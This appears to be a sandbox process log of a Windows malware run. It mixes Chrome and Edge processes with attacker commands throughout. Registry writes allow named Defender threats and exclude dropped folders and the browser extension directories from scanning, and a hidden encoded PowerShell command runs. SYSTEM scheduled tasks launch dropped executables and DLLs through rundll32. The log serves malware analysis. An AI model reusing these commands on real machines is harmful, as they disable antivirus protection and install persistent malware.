"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EJgSdoUbjkoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EJgSdoUbjkoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PyvCjIxDuxQTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PyvCjIxDuxQTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YxyTvvStIbUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YxyTvvStIbUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dTyeYvmCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dTyeYvmCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\SFedefwyVZzcKDVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\SFedefwyVZzcKDVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kfVVvYGwFixDeWua\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kfVVvYGwFixDeWua\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EJgSdoUbjkoU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EJgSdoUbjkoU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EJgSdoUbjkoU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PyvCjIxDuxQTC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PyvCjIxDuxQTC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YxyTvvStIbUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YxyTvvStIbUn" /t REG_DWORD /d 0 /reg:64
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4136,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=564,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:8
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dTyeYvmCU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dTyeYvmCU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR" /t REG_DWORD /d 0 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4308,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=4716 /prefetch:8
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\SFedefwyVZzcKDVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\SFedefwyVZzcKDVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kfVVvYGwFixDeWua /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kfVVvYGwFixDeWua /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcfbcpApC" /SC once /ST 00:37:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcfbcpApC"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5176 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcfbcpApC"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHAtfpaAUcCnRIDUD" /SC once /ST 00:16:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe\" O3 /AVgsdidGu 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "iHAtfpaAUcCnRIDUD"
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe O3 /AVgsdidGu 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6272 -ip 6272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 1340
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5216 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=1788 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dTyeYvmCU\zsMvLd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yoGdnYnzlZOyEUZ" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe722ab58,0x7fffe722ab68,0x7fffe722ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3628 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3940 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yoGdnYnzlZOyEUZ2" /F /xml "C:\Program Files (x86)\dTyeYvmCU\jwXwKip.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUjWiYKnFLBNBg" /F /xml "C:\Program Files (x86)\EJgSdoUbjkoU2\VhPDYbH.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MXVPsGGZsUdpk2" /F /xml "C:\ProgramData\SFedefwyVZzcKDVB\FvYaJSH.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "prMGXFkeeUTMdhmNg2" /F /xml "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\UNYNpNx.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dFoJmIVNgWiokFVCHjs2" /F /xml "C:\Program Files (x86)\PyvCjIxDuxQTC\rpkCVcK.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2704 -ip 2704
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "CBcZQdSiLQyVhMGrO" /SC once /ST 00:30:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kfVVvYGwFixDeWua\PePYHjlv\IGeWLVy.dll\",#1 /ztdidT 757674" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2320
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "CBcZQdSiLQyVhMGrO"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kfVVvYGwFixDeWua\PePYHjlv\IGeWLVy.dll",#1 /ztdidT 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kfVVvYGwFixDeWua\PePYHjlv\IGeWLVy.dll",#1 /ztdidT 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1684
